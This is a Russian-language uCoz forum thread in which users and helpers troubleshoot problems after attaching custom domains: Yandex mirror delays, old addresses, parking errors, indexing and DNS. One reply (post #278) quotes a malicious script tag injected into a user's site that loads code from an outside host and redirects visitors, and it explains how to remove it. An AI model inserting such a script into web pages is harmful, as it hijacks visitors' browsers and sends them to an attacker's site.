Модератор форума: Yuri_G, ilia_halupko  
Сообщество uCoz » Мастерская uCoz » Домен для сайта » Домен: последствия переноса
Домен: последствия переноса
Модератор форума
Сообщение # 1 | 09:25:25
Актуальная информация! 6.05.2015

==============================================

К сведению тем, кто переезжает на свой домен:

У Яндекса, похоже, была какая-то техническая проблема с зеркальщиком. По крайней мере есть примеры, которые больше 3-х месяцев не могут склеиться в группу зеркал.

Свежий ответ от Яндекса по одному из таких сайтов:

Цитата
Здравствуйте!

К сожалению, задержка вызвана техническими накладками с нашей стороны. Приносим Вам свои искренние извинения за возможные неудобства и просим еще некоторое время подождать. Ориентировочно, Ваши сайты будут признаны зеркалами друг друга в течение следующего месяца.


========================================================

В этой теме вы можете решить проблемы, возникшие после прикрепления домена: старые адреса, неоткрывающиеся страницы, вопросы индексации и прочее. Или узнать, что ждёт ваш сайт после переноса.

Правила ведения темы:

  • Сначала читаем вопрос-ответ, дополнения, личные опыты, затем задаём вопросы.
  • Запрещены сообщения:
    1) о переносе/прикреплении доменов (используйте для этих сообщений тему Перенос домена)2) о доменах вообще, и вопросах, не имеющих отношение к uCoz (используйте для этих сообщений тему Общение пользователей uCoz)
  • Нарушения удаляются, систематические нарушители получают замечания.




norton3775
Сообщений: 4
Репутация: 0

Сообщение # 271 | 17:49:04
Может быть Вы не поняли. Я поменял домен, соответственно поменял адреса всех страниц сайта.
Только на страницу статистики ведет прежний адрес с доменом юкоз. Можно его поменять на мой теперишний?
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 272 | 17:50:03
norton3775, адрес сайта

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
norton3775
Сообщений: 4
Репутация: 0

Сообщение # 273 | 17:53:29
cosmos-x.ru
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 274 | 18:03:44
norton3775, страницей статистики вы называете эту страницу? http://cosmos.ucoz.ru/panel/?a=ustat&u=cosmos&d=0&il=ru
похоже только так. но я же сказала можете прописать счетчик исходником и там прописать новые адреса и на картинку и на саму страницу статистики. в коде будет чисто без старых адресов.

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Alconry-ADMIN
Сообщений: 2
Репутация: 15

Сообщение # 275 | 13:41:33
Здравствуйте. Получил домен в подарок на domain.ucoz.com. Домен припаркован, но не прикреплен. Так же выдает следующее: "Временная техническая проблема при проверке статуса домена. Пожалуйста, попробуйте обновить страницу через 15 минут. Если проблема сохранится, сообщите в Службу поддержки". Я вообще хотел домен в зоне .RU, по при парковке мне приходило сообщение: "Serverside error. Try again later." Пришлось выбрать .COM. Однако все равно хотелось бы узнать в чем причина.
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 276 | 13:44:52
Alconry-ADMIN,
Цитата
Временная техническая проблема при проверке статуса домена, по причине DDoS-атаки на один из ДЦ. Информация о работоспособности серверов


//forum.ucoz.ru/forum/31-28494-1

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Biata
Сообщений: 38
Репутация: 2

Сообщение # 277 | 23:09:15
Ребята, подскажите пожалуйста захожу на свой домен kulinarof.net а он не активен. Думала закончился срок регистрации, но он заканчивается только в декабре. Помогите пожалуйста!!!

Когда захожу на domain.ucoz.com Вот что пишетСтатус: Заблокирован Примечание: это доменное имя в настоящее время заблокирован. Эта функция предусмотрена для защиты от мошеннических приобретение доменных имен, как в этом статусе доменное имя не может быть передана или изменены.
bandjuk
Сообщений: 6816
Репутация: 2398
Уровень замечаний:

Сообщение # 278 | 02:01:13
Biata, у вас на сайте установлен вредоносный код, он перенаправляет на другой сайт, через быструю замену удалите код:

<script language="javascript" src="http://gocash2.ru3.biz/js/back.php?id=43"></script>
Если смотреть сайт с отключённым java, сайт открывается нормально.



И да, обязательно смените все пароли от ПУ-хи и секретное слово
Прикрепления: 9565285.jpg (88.1 Kb)
Сообщение отредактировал bandjuk - Воскресенье, 21 Июл 2013, 02:04:35
Biata
Сообщений: 38
Репутация: 2

Сообщение # 279 | 12:33:39
bandjuk, спасибо вам огромное!!! Я бы никогда не догадалась!!!!
Крот8678
Сообщений: 5
Репутация: 0

Сообщение # 280 | 01:56:43
Привет , такой вопрос - почему Яндекс показывает мой сайт в поиске так mysite.ucoz.ru , а не mysite.ru ?
Переезд на другой домен был больше месяца назад и робот уже несколько раз посещал сайт .
Ministr
Сообщений: 842
Репутация: 323

Сообщение # 281 | 02:06:33
Крот8678, он изначально попал в индекс как mysite.ucoz.ru ? в панели управления вы ставили галку Автоматически перенаправлять со стандартного домена на прикрепленный? если все так, то подождите, яндексу потребуется время чтобы учесть вашу перееадресацию со старого домена на новый

Крот8678
Сообщений: 5
Репутация: 0

Сообщение # 282 | 16:07:36
Ministr, да ,изначально попал в индекс как mysite.ucoz.ru. А где именно в ПУ ставить эту галочку ?
Player9227
Сообщений: 2
Репутация: 0

Сообщение # 283 | 13:35:35
Здравствуйте! Я прикрепил домен (не юкозовский) к своему сайту. С месяц после прикрепления всё работало и ресурс был доступен по новому адресу. Но в один неожиданный момент домен начал выдавать ошибку 404 Not Found. Через старый домен зайти можно, в панели управления написано, что новый домен прикреплён и всё работает. Адрес домена . Что делать и на чьей вообще стороне возникла проблема не могу понять. На хостинге у которого покупал домен так же написано, что всё работает. Помогите плз.
bandjuk
Сообщений: 6816
Репутация: 2398
Уровень замечаний:

Сообщение # 284 | 14:41:02
Player9227, нормально сайт открывается
Прикрепления: 6423170.jpg (88.3 Kb)
Player9227
Сообщений: 2
Репутация: 0

Сообщение # 285 | 18:42:49
bandjuk, забыл просто отписаться, что сам всё исправил) Оказалось, настройки DNS у регистратора слетели волшебным образом. Но всё равно спасибо за ответ.
Сообщество uCoz » Мастерская uCoz » Домен для сайта » Домен: последствия переноса
Поиск: